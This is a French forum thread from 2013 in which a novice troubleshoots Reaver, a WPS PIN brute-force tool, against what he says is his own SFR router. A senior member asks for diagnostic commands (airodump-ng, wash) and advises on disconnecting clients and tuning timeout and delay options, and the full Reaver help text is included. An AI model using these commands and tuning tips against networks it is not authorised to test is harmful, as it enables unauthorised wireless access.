Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-04-2013 23:59:16

piratelechien
Nouveau membre

plein de soucis avec reaver

Tout d'abord,bonsoir à tous.
Brièvement,je vous demande ou je peux poster mes questions relatifs à mes soucis avec reaver,après avoir essayé pendant 3 jours avec tous les tutos et versions 1.3 et 1.4.
Merci de m'indiquer ou expliquer mon cas,avec mes questions et captures d'écran.
Bonne soirée à tous :-)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-04-2013 14:58:04

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : plein de soucis avec reaver

Tu pourrais le publier dans "crack de clef WPA" par exemple, de toutes façon ne te préoccupes pas,  nous sommes à ton service pour replacer le sujet si nécessaire wink
D'ailleurs je mets ce topic dans place à la discussion. tongue
Essaye juste de bien cerner le/les problèmes (faire un titre descriptif t'aide dans ce sens)
A bientôt wink

#3 16-04-2013 15:42:16

piratelechien
Nouveau membre

Salut Kcdtv, et merci pour ton aide et ton temps.

Je suis sur B53 sur clé usb,sur un portable acer avec une realtek interne mais j'ai une awuso36h en usb,et c'est elle qui est en mon0.J'ai pas de problèmes sous airodump pour detecter les reseaux.
J'ai donc lancé airodump,trouvé plein de points d'accès,dont le mien.
J'ai une sfrbox,et j'ai vérifié,le WPS est activé. Je me suis donc dis que j'allais la tester avec reaver.J'ai galéré comme un fou...j'ai désinstallé le1.4 par le gestionnaire de paquets,ai installé le 1.3,pas mieux.....donc me suis débrouillé pour remettre comme je pouvais le 1.4.Je tiens à te préciser que j'ai installé B53 que depuis 1 mois et que je dévore les forums pour poser le moins de questions possibles,mais là je suis carrement à la rue !!! :-(

Je te fait un copié collé de mon shell:

[email protected]:~# reaver -i mon0 -b E0:A1:D7:E5:20:0C -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from E0:A1:D7:E5:20:0C
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 11
[+] Associated with E0:A1:D7:E5:20:0C (ESSID: SFR_2008)
[+] Trying pin 12345670
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 11
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

#4 16-04-2013 16:13:11

kcdtv
Membre d'honneur

J'ai modifié ton message en utilisant la balise code, c'est "plus mieux" tongue

Donc le problème est cerné>

[!] WARNING: Receive timeout occurred
[!] WPS transaction failed (code: 0x02), re-trying last pin

Au lieu de mettre un titre "plein de soucis" (qui n'est pas descriptif) site le "time out", le modèle de ta box... ce sont des eĺéments beaucoup plus parlants que plein de soucis.

Bein, je suis un peu déçu.... tongue
Nous n'avons presque pas d'éléments...

Pour commencer il nous faudrait savoir

- modèle du chipset utilisé pour l'attaque

lsusb
lspci

- vérifications sur  interfaces

iwconfig
airmon-ng

- vérifications stations-signal

airodump-ng --bssid mac_routeur --channel XX <interfaz>

- vérifications WPS

wash -i <interfaz> -C

Avec ces éléments en main on pourra commencer à y voir plus clair, même su j'ai déjà ma petite idée sur la cause du problème wink

#5 16-04-2013 16:41:50

piratelechien
Nouveau membre

riressss désolé je suis pas doué et je fait la max pour éviter de poser trop de questions,donc je suis maladroit :-(

Interface	Chipset		Driver
mon0		RTL8187 	rtl8187 - [phy1]
wlan0		Atheros 	ath5k - [phy0]
wlan4		RTL8187 	rtl8187 - [phy1]
05:00.0 Ethernet controller: Broadcom Corporation NetLink BCM5787M Gigabit Ethernet PCI Express (rev 02)
06:00.0 Ethernet controller: Atheros Communications Inc. AR242x / AR542x Wireless Network Adapter (PCI-Express) (rev 01)
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID       

E0:XX:D7:XX:20:XX  -19  30       75       11    1  11  54e  WPA  CCMP   PSK  SFR_2008    

BSSID              STATION            PWR   Rate    Lost  Packets  Probes                

E0:XX:D7:XX:2X:XX  00:1F:3A:3F:FD:ED   -1   48e- 0      0        5                        
 E0:XX:D7:XX:2X:XX  04:1E:64:39:DC:04  -29    0 - 5      0        8                        
 E0:XX:D7:XX:2X:XX  00:08:D3:38:1A:D9  -42   48 - 1      0        7   

xxxxxxxxxxxxxxx       1            -71        1.0               No                NEUF_9B50
xxxxxxxxxxxxxxx       1            -71        1.0               No                maison
xxxxxxxxxxxxxxx       6            -42        1.0               No                Livebox-b180
xxxxxxxxxxxxxxx       6            -72        1.0               No                Livebox-3768
xxxxxxxxxxxxxxx      11            -20        1.0               No                SFR_2008
xxxxxxxxxxxxxxx       6            -60        1.0               No                Livebox-7eb6
xxxxxxxxxxxxxxx      11            -66        1.0               No                NEUF_099C

voilà,j'ai fait ce que j'ai pu,mais tu m'expliqueras pour mieux présenter car je voudrais pas te gonfler avec mes copiés/collés

#6 16-04-2013 17:18:30

kcdtv
Membre d'honneur

Les copiés collés ne gonflent pas, ce sont eux qui amène l'information pertinente, je remets en page en utilisant la balise code, fais le dans le futur, ça permet de bien voir rapidement ce qui est code et explications-commentaire wink

Ce que nous savons (grâce au copié collé) c'est que tu as trois stations connectés, trois clients,...
problème vu que pour revaer c'est très difficile avec des clients connectés. alors si il y en a trois...
Je suppose que en plus tu est connecté avec ton rtl8187l ce qui rend l'attaque presque impossible: il te faut être déconnecté, que la wlan qui correspond à la mon0 (wlan4 dans ton cas) soit au repos.
et utilise la connexion par câble directement au routeur, aucun clients wireless connecté si tu veux bien faire ton attaque.

#7 17-04-2013 09:10:11

piratelechien
Nouveau membre

Je vais essayer ce matin,voir si je retrouve un cable ethernet.....sinon j'eteindrais mes deux autres pc.Je te tiens au courant,merci pour ton explication. Tu pourra me dire aussi comment on post les balises codes? car c'est plus propre et compréhensible,mais je sais pas comment faire :-)

#8 17-04-2013 10:21:32

piratelechien
Nouveau membre

Bon,n'ayant pas trouvé de cable,j'ai donc coupé mes deux autres ordinateurs.Sur celui ci,j'ai dans airmon stoppé wlan1 et mis wlan4 (l'alfa) en moniteur. Je suis ensuite allé dans Wicd Network Manager pour vérifier que je n'était pas connecté sur mon reseau,ni un autre,et vérifié avec firefox et donc pas connecté au net. Je vérifie en faisant également un airodump et là...surprise,je me vois en station connecté en bas !! Donc déjà là je comprend pas tout.
Je retente un reaver -i mon0 mon essid -vv et rebelote,les mêmes messages d'erreur....je m'associe avec ma box mais j'ai des timeout et des wps transaction failed.....:-(  Le seul moyen c'est de trouver un cable ? J'ai vu plein de tuto sur le site et le net par wifi pourtant

#9 18-04-2013 04:33:04

kcdtv
Membre d'honneur

L'important c'est d'avoir aucun client wireless connecté durant l'attaque reaver.
Tous les routeurs ne sont pas vulnérables. Peut être c'est le cas de ton routeur (Au fait, quel est le modèle?)
Éloigne toi un peu du point d'accès (au cas où tu le sature, pwr -20 tu dois être à côté),
Essaye d'augmenter le delay pour le time out.
En tapant "reaver" en console, tu verras les différentes options

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

Required Arguments:
	-i, --interface=<wlan>          Name of the monitor-mode interface to use
	-b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
	-m, --mac=<mac>                 MAC of the host system
	-e, --essid=<ssid>              ESSID of the target AP
	-c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
	-o, --out-file=<file>           Send output to a log file [stdout]
	-s, --session=<file>            Restore a previous session file
	-C, --exec=<command>            Execute the supplied command upon successful pin recovery
	-D, --daemonize                 Daemonize reaver
	-a, --auto                      Auto detect the best advanced options for the target AP
	-f, --fixed                     Disable channel hopping
	-5, --5ghz                      Use 5GHz 802.11 channels
	-v, --verbose                   Display non-critical warnings (-vv for more)
	-q, --quiet                     Only display critical messages
	-h, --help                      Show help

Advanced Options:
	-p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
	-d, --delay=<seconds>           Set the delay between pin attempts [1]
	-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
	-g, --max-attempts=<num>        Quit after num pin attempts
	-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
	-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
	-t, --timeout=<seconds>         Set the receive timeout period [5]
	-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
	-A, --no-associate              Do not associate with the AP (association must be done by another application)
	-N, --no-nacks                  Do not send NACK messages when out of order packets are received
	-S, --dh-small                  Use small DH keys to improve crack speed
	-L, --ignore-locks              Ignore locked state reported by the target AP
	-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
	-n, --nack                      Target AP always sends a NACK [Auto]
	-w, --win7                      Mimic a Windows 7 registrar [False]

Example:
	reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

Essaye de jouer avec "-t" et espace aussi un peu les pétitions entre elles ("-d")

#10 18-04-2013 08:26:03

piratelechien
Nouveau membre

oui je suis juste à coté.Mon routeur est une neufbox sfr blanche avec le bouton central.Le modèle exact,je suis un peu novice sur le sujet..:-( Dessus il est écrit  NB6-FXC-r2.
Je vais essayer ce que tu me dis avec les différentes options de reaver et m'éloigner,vu la puissance de l'antenne en plus.
Je te tiens au courant,et je te remercie.
Ma voisine est en livebox,je verrais avec elle si je peux essayer sur une livebox,sinon au pire,ben temps pis !! :-)

Annonce